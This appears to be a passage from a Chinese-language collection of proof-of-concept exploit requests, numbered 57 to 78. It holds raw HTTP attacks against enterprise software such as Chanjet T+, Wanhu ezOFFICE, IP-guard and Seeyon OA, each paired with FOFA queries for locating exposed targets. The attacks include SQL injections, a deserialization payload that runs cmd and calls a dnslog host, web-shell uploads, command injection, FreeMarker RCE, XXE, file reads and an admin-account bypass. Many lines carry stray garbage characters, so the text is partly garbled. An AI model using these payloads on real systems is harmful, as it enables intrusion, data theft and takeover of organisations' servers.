POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
! K2 d& \2 E1 d% M" ?Host: x.x.x.x
2 N- @- w5 l7 J& ]- EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
* d* z# ~9 b  @& g5 x  t8 dContent-Type: application/json- I' t/ b+ j; Q, U$ X

0 U4 H6 m; t" d! }: q( P+ B{: G* Q8 }+ B$ O6 S  v4 i, X! ]% k
  "storeID":{# }) j1 r+ u/ p' }% h+ T0 d2 d6 p3 P
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 B% Z' M+ j7 ^8 T# F0 w) ^
   "MethodName":"Start",
- z7 ^! t2 s0 [' z& R" I) S; W; L    "ObjectInstance":{
! i" }2 E: H, g# x- }) \! R2 I       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* f. a5 p! _2 D; M- }$ M. q- Y
        "StartInfo": {9 @1 D3 i" \+ v- X; O9 g
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% n% D( ^6 n  n* b5 k7 \
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
6 ^+ |# U* J5 X; H, k       }
: G" {3 ^8 g  l0 ^7 U    }7 E: I! ?9 b0 ?3 S5 O, ?6 w, @& O- @
  }% g* z& M! k3 ]3 q
}
8 L( r" n" O- R/ i+ f: e, J; K
* D+ e$ o* C& v# A( U- x7 M4 x2 b
; S- c' s0 _. c) c0 `6 p$ o57. 畅捷通T+ keyEdit.aspx SQL注入
& u4 L$ Z: w$ N! @FOFA:app="畅捷通-TPlus"- _1 r0 L- F3 m
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
; P9 y* j" P( ~* G7 ~+ T" h0 cHost: host' k' s0 p3 P2 {$ i
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ L) X9 l6 Z5 c/ y% s! N
Accept-Charset: utf-8; U9 ^6 J; U4 M! {$ a' u/ i
Accept-Encoding: gzip, deflate
! ^) b- X( J0 _  Q3 H5 R' C; UConnection: close
" \1 j3 P+ a9 l2 R# |- X9 `6 v  w% Y8 q5 o, H1 y* i
) Y! x# g! d0 I/ g" p( {! p! n
58. 畅捷通T+ KeyInfoList.aspx sql注入* T% S2 E1 k* R  U4 G& p
FOFA:app="畅捷通-TPlus"0 r( O" {% M7 V
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.14 u* K( k" T& m$ b, x: j# H
Host: your-ip
$ ^; j% G" B3 G& X- @User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 o0 K5 \; ~/ K" N) B( h
Accept-Charset: utf-8- Q% ~* s% U4 W0 k
Accept-Encoding: gzip, deflate
1 b0 o; u' E0 J2 M6 uConnection: close) ]) h; X/ i) Y* _0 W$ _1 b8 y

/ j" S6 V: P2 B4 m, u+ c
9 H; f% D+ }# ^; L6 ~4 s4 c59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行$ w5 \. T" ^% B  P3 O' e$ y; D
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"3 b, \0 r# }( h3 s2 ^1 A
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1, J- C& b( z7 q6 w& ^; D1 `7 P
Host: 192.168.86.128:9090
  f/ _0 l# g, x0 N/ N# g: ?User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
2 ?7 l" h% z: V% S: O; g" h5 O; oConnection: close
2 l/ M4 ^# _- yContent-Length: 16695 J! n# M0 I7 C4 Q! k9 y, L0 D  a
Accept: */*
- a. N" k# @1 m4 SAccept-Language: en
" ?( Q+ G* q: T; X) EContent-Type: application/x-www-form-urlencoded
" L/ ]7 l% Z* f2 mAccept-Encoding: gzip- H4 f! A$ F9 l; a6 S! g& T
- w7 L% f; z; R0 {% @: M* M1 s
PAYLOAD9 J5 x3 f+ t) z2 n) _4 C) x# u
( I* c6 g* S4 b

: j, w4 A5 k2 @/ J' r. V: M60. 百卓Smart管理平台 importexport.php SQL注入- c- @' D: V+ q7 ]0 z
FOFA:title="Smart管理平台"4 s5 ]/ r  Q8 J) q
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
) d6 _/ _! ~. P$ j8 D3 |0 k' M# EHost:0 V0 {+ C9 Y5 u" m8 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' j( `8 R6 r2 f$ S* Y4 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; v. v* t- \2 t
Accept-Encoding: gzip, deflate" {* B) I- o& y7 x7 z( b& ]
Accept-Language: zh-CN,zh;q=0.9! v* l, a% j: f. M: \% `+ n' c* ~+ l
Connection: close
& A  C4 O' p5 }5 s, G9 h7 R
" Q9 B4 `) [9 c0 J1 l: o; W- c3 S' q" Y$ X9 m: @% D( b
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传% v6 T' P3 g' i
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
: q- F3 G) ]3 V, \4 I& uPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.11 |2 }2 T+ C3 I2 f- U
Host: x.x.x.x1 ^' w9 E5 D- \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 c6 i& Y' O! E& P; V6 EConnection: close, t/ Y' M" V; @8 D+ L5 e
Content-Length: 27
6 q2 }7 V6 f- q* _. `* {+ fAccept: */*3 o1 Y- [) v% b+ ]+ @* u1 B1 n
Accept-Encoding: gzip, deflate0 G$ G1 q1 c$ k
Accept-Language: en- }/ [2 t2 A! M
Content-Type: application/x-www-form-urlencoded5 ~# \# A  C3 @4 K- M
3 X9 Y3 q0 Y6 K
8uxssX66eqrqtKObcVa0kid98xa
3 c( s/ S0 @7 U) s+ l
' z) ^; j" z6 z% S) A
0 V' _" h8 {" d$ X' X0 ?6 u62. IP-guard WebServer 远程命令执行
8 i/ O; T1 u2 o3 n, l% [FOFA:"IP-guard" && icon_hash="2030860561"' F5 K* v+ f6 c2 S
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: X7 f9 k* H, `; g3 O2 XHost: x.x.x.x
8 l6 t8 P; w* tUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.367 }* d$ u2 @/ T3 y' T9 v- W& g! f# L* T
Connection: close
! W/ K1 f! `+ d9 N( a( O! D5 lAccept: */*( ?/ V: j8 M+ |  _, j# Z- Q
Accept-Language: en$ y  I* _2 d8 R0 U3 ?6 p% V
Accept-Encoding: gzip
2 k5 k5 G! k1 |8 {, \
% M; u& `$ {# D5 T3 V$ D& t1 b
( Z2 z6 o: x) u8 n& r9 [* O, }; K访问" b' U5 J* }1 t' x* r
  X; p0 ]6 ]5 s* p. F
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.13 m/ K2 @1 l) e
Host: x.x.x.x; O; D" G3 f. c' x( C
3 b$ [# {& t; g4 Y
% V8 l  q, y5 z6 i, Z
63. IP-guard WebServer任意文件读取- m$ \  b$ m. T
IP-guard < 4.82.0609.0
( \8 ]! W% s5 z6 c0 {! lFOFA:icon_hash="2030860561"
8 ~8 C5 ^; Q5 d9 M0 ZPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.19 }9 F- x5 X* O$ a# B/ }; c
Host: your-ip
& w( y7 r- r' x2 u! Z% o: {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, x: A/ h  {" |7 x; P! u: D- k$ \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 z9 J6 Q: d4 l7 iAccept-Encoding: gzip, deflate. F, a& b4 Z6 ^/ X
Accept-Language: zh-CN,zh;q=0.9
6 o/ h% [0 Y- N: B# VConnection: close) A# S- K0 q  P1 _( n1 }/ T
Content-Type: application/x-www-form-urlencoded
6 y7 L1 l6 b4 P1 F# x+ N5 m& @2 s* B$ n1 m
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
1 t, L0 |  O/ ^0 ~' w" i
/ e# U* [1 X, V64. 捷诚管理信息系统CWSFinanceCommon SQL注入  k# c) Y+ c; y+ u
FOFA:body="/Scripts/EnjoyMsg.js"
: K* Z3 O( {! P+ ~( q7 EPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.14 S9 `: M0 X5 Y! x8 e; n
Host: 192.168.86.128:90015 U0 ]2 P, ?& B$ ?# {
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
$ G: u( U/ n# r+ a3 M* Y6 NConnection: close3 Z# S2 i- S4 M
Content-Length: 369+ t2 E9 N; P: k, l9 ?+ Y: y1 B% `
Accept: */*
% V, _% k. k- I5 lAccept-Language: en
, i. W* E9 G' z6 {. b+ \" TContent-Type: text/xml; charset=utf-8
% N" R7 \6 h" A* f; D" A' sAccept-Encoding: gzip. _; ?: ~( b: r( K& E, N
3 k8 M6 S$ j! [& u& t
<?xml version="1.0" encoding="utf-8"?>
8 R9 F$ B. a9 G<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
$ n* R# Y3 Y, q; v4 w( u<soap:Body>2 S4 |% f7 J3 P5 m$ C% }& D5 t3 ~" e
    <GetOSpById xmlns="http://tempuri.org/">1 b# J; A/ X8 _. P# ^
      <sId>1';waitfor delay '0:0:5'--+</sId>& a, l. I# C* s4 l% r1 ]) Z3 u
    </GetOSpById>% Q/ Y  \) [: V2 A. ^9 P
  </soap:Body>
0 Y( @/ a: u0 _3 j, x. `* r9 y. B</soap:Envelope>
" j* u9 p7 o  m4 {/ |$ R  ]2 z0 o6 k( ]1 ^

9 E8 r7 i& x6 s5 ^4 t65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
5 e7 L1 K# x0 E1 P1 LFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
& x/ g7 ~* D# B& x3 l/ W响应200即成功创建账号test123456/123456
3 j$ H" p3 \$ m; a) G) o( tPOST /SystemMng.ashx HTTP/1.1
5 B' ~! n* ~( X0 j/ WHost:
3 ~' f8 Y/ J: S# g5 AUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
/ V4 m$ G7 t3 Q/ e: m+ oAccept-Encoding: gzip, deflate
& ~( T7 s( ^% b+ s* dAccept: */*1 ?, ~# O% ^& ]. z* Z
Connection: close
4 n; j3 x' p2 ^Accept-Language: en
0 s) V- [7 O5 M3 s* IContent-Length: 174
& x& [* F, |  N. `  L
# @2 E5 @% Z% A2 J8 noperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators4 Y2 n- n3 }: d7 E
; k- f5 F/ _: }2 b0 g/ w

7 W7 n9 U& Y3 c% M* @& J. d66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入3 C$ A' X5 p" @( \
FOFA:app="万户ezOFFICE协同管理平台"
& M* L! W: o% I; z5 Q. o8 K' ?3 ^
& f+ a2 q) i# {) KGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
- O% r5 u7 }- I% KHost: x.x.x.x9 H7 C9 _4 k; B: x( ]2 H: \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
6 G; |& N  }4 h8 y7 cConnection: close
0 y0 G# v$ P3 u- EAccept: */*1 o0 K, Z) @# u/ Q$ g2 w
Accept-Language: en$ n* N) k+ o- B, o
Accept-Encoding: gzip5 O" {# N2 ^1 f
' Z! r: d8 f( K6 G/ ?8 k( b
" W% \0 }7 [$ H6 T
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在5 ]+ Y6 U9 W. S& S
7 u; A6 Q( {5 s8 V) B, S
67. 万户ezOFFICE wpsservlet任意文件上传
) o! u9 i: ]1 NFOFA:app="万户网络-ezOFFICE"
. w5 ^6 B6 q' [! [0 z" f8 P" OnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型; l3 n: h- N' ]$ b5 h/ B! H! B
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
9 F; v4 W5 i7 ?9 i0 IHost: x.x.x.x
) h' U; l3 ]2 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0& k  ?$ F; |9 m7 c9 b- ~2 W' x
Content-Length: 173& d0 |! j! e3 ]! |: F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/ w- c) N( W' C) j1 F6 F9 C
Accept-Encoding: gzip, deflate2 C6 x+ Z1 s9 G- u& r% H
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
9 K) Y: C7 u0 o: z/ r, ]9 M* x/ BConnection: close( i  ~& B0 u( l6 q; v/ n
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
0 a& P5 k" S5 Q6 Y. l$ hDNT: 1" \5 N7 h; \% {, s" l6 I& D7 a
Upgrade-Insecure-Requests: 1
  t6 X0 J6 e9 w& p- j
! o- h: u' y5 k' h/ H$ D2 I9 f3 o0 s--ufuadpxathqvxfqnuyuqaozvseiueerp
# i8 [/ ?/ D8 B* NContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
; u4 }& |  I( `: n6 ?8 g+ j
- Z4 ?: p# g. X  r( A<% out.print("sasdfghjkj");%># _" ]& |1 x) C/ c' u  f
--ufuadpxathqvxfqnuyuqaozvseiueerp--+ g% L' I/ ~/ N- ], x
8 o) C7 X2 h, Q* a" f

, P  p5 ?/ B# T# A9 w文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp* x0 h" N- d! X/ S9 @8 U" q' H) a/ m9 I, N

( Q. t; V# X4 u68. 万户ezOFFICE wf_printnum.jsp SQL注入
4 O9 K: |1 ~7 Y$ ?$ J# |* |FOFA:app="万户ezOFFICE协同管理平台"# }! Y8 w- s& P/ [5 ^7 j$ W
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
# x0 S# o$ y9 v0 }/ pHost: {{host}}
4 ]1 [3 f6 y) Z* TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
$ r. a8 a+ U4 C$ z7 NAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8: [; p3 J& K& |5 p4 ]$ h# s; Z) t
Accept-Encoding: gzip, deflate3 }  g: W  U+ |# ], ^. W- w
Accept-Language: zh-CN,zh;q=0.9
* D+ a/ B& L8 F$ TConnection: close
5 ]& N# U5 m$ s( ]& |* X  m! @- p! y6 `

5 t6 M8 {8 j% H/ V: x/ y$ H69. 万户 ezOFFICE contract_gd.jsp SQL注入& u: |) c! Y+ u) x# A; p4 ~; C
FOFA:app="万户ezOFFICE协同管理平台"6 Y. m+ y, e" j$ |
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
, J0 d& k: O4 ]- ^Host: your-ip
, d) e. r4 w$ L3 w9 G4 z0 L) ZUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 L4 W, M, i2 U! r- a- {/ pAccept-Encoding: gzip, deflate. |3 e" H3 w+ m* I
Accept: */*+ B: [  u9 V( {# [2 c. [9 ?
Connection: keep-alive! K1 X& T3 P+ D9 X
  W  x0 @( s6 s# N* `" Q2 R6 |

/ G- r) `/ H. T( I: X70. 万户ezEIP success 命令执行* [+ J. _9 x1 U# U
FOFA:app="万户网络-ezEIP"6 |( M/ ~; H1 I7 x: B
POST /member/success.aspx HTTP/1.1
* i$ a: i& J- ?Host: {{Hostname}}9 O4 R; x& W; V; T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 V0 i9 u. |% U
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=6 h4 D, ^$ X: i/ [
Content-Type: application/x-www-form-urlencoded6 O: Y( \' {6 X: E# A8 ~$ o) `  b
TYPE: C/ e5 v  n/ y# n
Content-Length: 167026 p* k! s( t3 N8 Q* e4 a6 s, R% l

0 c3 {0 v+ x$ K& S) b/ {__VIEWSTATE=PAYLOAD
, T" E1 w% ]: J2 V
( M  {) {0 X; Z0 y- r$ J; T
3 H( F7 m3 ?# l  X5 P6 U. t71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入; |# P4 V9 c) f9 |# Q" s
FOFA:body="PM2项目管理系统BS版增强工具.zip". d% @4 m. P; ~  x
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.18 Z/ Q0 c; k$ l8 ?7 P6 L
Host: x.x.x.xx.x.x.x0 h0 d/ h4 s* O$ J  A2 e3 @
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36( B, D/ {8 V, c8 }2 |; T
Connection: close8 g! S1 q" n. X6 ^, n6 I0 T( }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) e$ D0 H1 p# F; J& u6 L. y4 i3 t/ XAccept-Encoding: gzip, deflate0 e2 Z, E& R* P* J( n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 G  W6 _2 q% s* ^  ~Upgrade-Insecure-Requests: 1% e- a* Q7 O/ u4 P7 k, ^
6 \1 ^& h- n, S, U

* F: r5 g. a* {7 C# w3 ^72. 致远OA getAjaxDataServlet XXE2 K% \( ^$ k* h% ~! v3 D
FOFA:app="致远互联-OA"
, L; b' Y& E9 y5 H. G8 k! hPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
# p. z3 ~& E; K2 `4 x* h3 }0 nHost: 192.168.40.131:8099
& `9 C' k. O3 @! L8 c( h& ]- mUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' C/ f8 ?5 z& b. B" ]
Connection: close. O$ ~% J0 ~9 Z4 q- B& F7 E
Content-Length: 583
; e+ C6 m  e( ~Content-Type: application/x-www-form-urlencoded
, s! i' E" y/ ], }; h( yAccept-Encoding: gzip; q; B: n; N7 D- P$ Q( }

- @+ Q4 z! ~0 [+ s" @: B( `3 oS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
# ]7 [0 _+ o3 p1 u, l% G1 d! c; ^2 J. M- _

5 v1 w1 |9 ~+ s# b  J; @+ G! b73. GeoServer wms远程代码执行/ T) |! v; C: t  ~
FOFA:icon_hash=”97540678”
1 J3 @7 o' l; BPOST /geoserver/wms HTTP/1.11 y. I. {( R: z
Host:
4 i, a' Q/ {0 n3 y9 {. i, R8 r2 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
1 z. a$ f. c9 p( K: m! }  e7 DContent-Length: 1981$ T( R0 Y* O; n/ R" k2 j
Accept-Encoding: gzip, deflate
! f2 D2 Q' h5 j4 S" YConnection: close
* H( Z7 ~' e1 z' Y' E; M* aContent-Type: application/xml
# u9 M& G; Y- x6 r* _SL-CE-SUID: 37 v1 U/ C+ g* q# m- d

' y/ g$ S5 [6 GPAYLOAD2 m* ~, Q+ u# W: {
; |3 H) a# P5 P2 |3 B9 n
3 l& g' F% G) E: W: N  D
74. 致远M3-server 6_1sp1 反序列化RCE
: a) H6 _. l# \/ \* jFOFA:title="M3-Server"
1 E) R/ i+ {  J& [PAYLOAD
' k1 ?5 e/ D$ d
. ^! E7 `" Y% M+ ]3 X( _9 G75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE6 p/ y1 j2 I7 g! B* y$ {
FOFA:app="TELESQUARE-TLR-2005KSH"8 O& g+ V' M% d6 G
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1; C$ z$ [. o3 l/ z
Host: x.x.x.x
% V; ^# R: ~% s& D# q$ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& t& c2 `- _" dConnection: close
# b( |3 @% S; L6 W/ |% o( {# VAccept: */*. ]6 l! W6 ^) D' o+ {7 t9 Z$ n8 n
Accept-Language: en2 ]3 y: v: @0 ~3 Y7 |
Accept-Encoding: gzip
, A4 ~' u; M+ U
2 f0 B  w$ m% N5 Q- i3 M- \! b& Y! G! a* |# {- ^$ X
GET /cgi-bin/test28256.txt HTTP/1.1- C1 x1 q8 X' [5 U
Host: x.x.x.x( o9 K; V( _: n. A6 Q2 D& {6 z

% }# q( D" s6 \, f( V
9 K# {! h) `9 ^4 r0 k/ o76. 新开普掌上校园服务管理平台service.action远程命令执行: |: y( r0 y9 ~- F* f& j
FOFA:title="掌上校园服务管理平台"
& Y4 l% o/ E! E; a7 t/ iPOST /service_transport/service.action HTTP/1.1! F: K6 w1 E0 s8 N4 o8 q+ {
Host: x.x.x.x
/ l" c* n* s/ }4 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0& ?& U9 ]5 s/ x6 c! M
Connection: close6 q2 `/ |  a5 k7 n( r/ O9 V! q3 N
Content-Length: 211
8 K" J( C* Z# k& ^* `$ V1 C9 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% N5 {! N8 y5 x9 i; A
Accept-Encoding: gzip, deflate
4 T) H" ?& b! [% A* F5 v4 f& ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* b) q) t; X% F0 n* n' q: j
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
! `  {) |6 ?) q+ i  tUpgrade-Insecure-Requests: 12 k- y5 W* Z% R" b, Z5 X

. S( o0 D5 X" `& @& Z: z- K{
! y" {" F- H- b, K8 ~  m* N% Z3 E"command": "GetFZinfo",
! Z) n5 Q7 R, h) g% B3 O  R  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"3 _& `) q+ C( a4 R2 l! r
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
8 }3 K5 R+ f) S* x}2 B0 v# y: O6 v7 F- C, m
6 ]4 k& Y8 e3 F( j* X$ f- z6 L
" O( Z( ^& S0 N0 t1 c
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1, p  Z+ |$ J! L7 |8 d* A1 R1 Q
Host: x.x.x.x
* u; H$ ?* k$ h1 U# t9 a( x( \8 v+ b9 |! e* v/ k# q. n
( r" o7 y# T  D; [- F
0 O5 Q8 p( J1 }! t, |+ a
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
; \* g4 }" Q2 ], `+ E1 \FOFA:body="F22WEB登陆"
5 Y% @& b( P( {" V2 \8 D" M- ?" k' n" qPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.18 J. k4 u( A) d9 R" c: L2 c
Host: x.x.x.x
8 m, ~4 f' s% h8 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" K( L. I! W; \4 i
Connection: close
& [, Y7 e4 p- n/ h- kContent-Length: 4334 y' i4 S1 |5 K7 \4 u. L; ]" e6 _4 _) o
Accept: */*+ |; Q5 \. R0 C8 j9 C! o' a
Accept-Encoding: gzip, deflate; t; Z) q$ f! |' R7 P1 ~0 F
Accept-Language: zh-CN,zh;q=0.9% A2 K2 l5 y) w! J! |, T& z
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
+ g9 P4 }+ ]: j/ ~3 _/ ], e# ?4 _5 E8 u
------------398jnjVTTlDVXHlE7yYnfwBoix4 b4 D" `! X; w& X+ n
Content-Disposition: form-data; name="folder", `  y! N8 ]" O7 W; M) }2 N
2 n- M. x7 W; E! Y7 c+ W# L2 [* _
/upload/udplog. N) N% V4 p* t
------------398jnjVTTlDVXHlE7yYnfwBoix
2 X- V6 O" y- S2 _* D# f+ MContent-Disposition: form-data; name="Filedata"; filename="1.aspx", i6 V$ K: z# r. A8 N/ ^
Content-Type: application/octet-stream# v0 R* U' @1 D" |/ v( x
4 b2 i. P, T. \
hello12345676 r- L, B6 \2 c" }; i" D& X+ Q2 v6 I
------------398jnjVTTlDVXHlE7yYnfwBoix
+ q( R" d- Q1 y. v+ e  s1 SContent-Disposition: form-data; name="Upload") C9 E* D6 r# [/ ^, P4 _1 [

8 ~# H9 H+ v* B! f6 _1 R& [9 s( }3 ]Submit Query
# V" L, @# h+ r* H4 ~- |6 v------------398jnjVTTlDVXHlE7yYnfwBoix--7 d1 Y) m+ ]9 m# W

4 M; D3 |* d/ S3 T; `$ v8 j
- n' h5 K# y" C0 e' l0 \78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
" Z/ _8 y! T1 s) |FOFA:icon_hash="2001627082"
6 D% x- Q6 v9 _, [! GPOST /Platform/System/FileUpload.ashx HTTP/1.1
2 g0 l1 q* g1 v2 z8 e, l" d3 T. i. IHost: x.x.x.x# K( V, O1 C  z! U) ]% i+ l5 o$ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' t- M+ w8 X: ZConnection: close
9 y7 H) E7 j0 O+ Y; u  M3 ~+ ~& pContent-Length: 336
% z4 F4 `7 b% s) aAccept-Encoding: gzip; y  }! K( N4 l9 e# z) `& E
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
& @* @, J+ e+ r0 Q  T$ y1 g
